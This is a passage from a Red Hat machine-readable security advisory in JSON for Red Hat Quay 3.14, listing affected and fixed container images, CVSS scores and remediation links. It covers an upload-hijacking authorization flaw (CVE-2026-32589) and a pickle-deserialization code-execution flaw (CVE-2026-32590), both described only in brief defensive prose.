            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "github.com/jackc/pgproto3/v2: github.com/jackc/pgproto3/v2: Denial of Service via malicious PostgreSQL server"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-32589",
      "cwe": {
        "id": "CWE-639",
        "name": "Authorization Bypass Through User-Controlled Key"
      },
      "discovery_date": "2026-03-12T14:43:07.878000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2446963"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay\u0027s container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user\u0027s in-progress image upload.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: quay: insecure direct object reference in BlobUpload",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation requires valid login credentials to the Quay registry. Unauthenticated users cannot exploit this flaw.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32589"
        },
        {
          "category": "external",
          "summary": "RHBZ#2446963",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446963"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32589",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32589"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32589",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32589"
        }
      ],
      "release_date": "2026-04-08T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "mirror-registry: quay: insecure direct object reference in BlobUpload"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-32590",
      "cwe": {
        "id": "CWE-502",
        "name": "Deserialization of Untrusted Data"
      },
      "discovery_date": "2026-03-12T14:43:11.443000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2446964"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay\u0027s handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: remote code execution using pickle deserialization",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation requires valid login credentials. The attacker must be authenticated to the registry, either through the web interface or through a container tool such as Podman.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
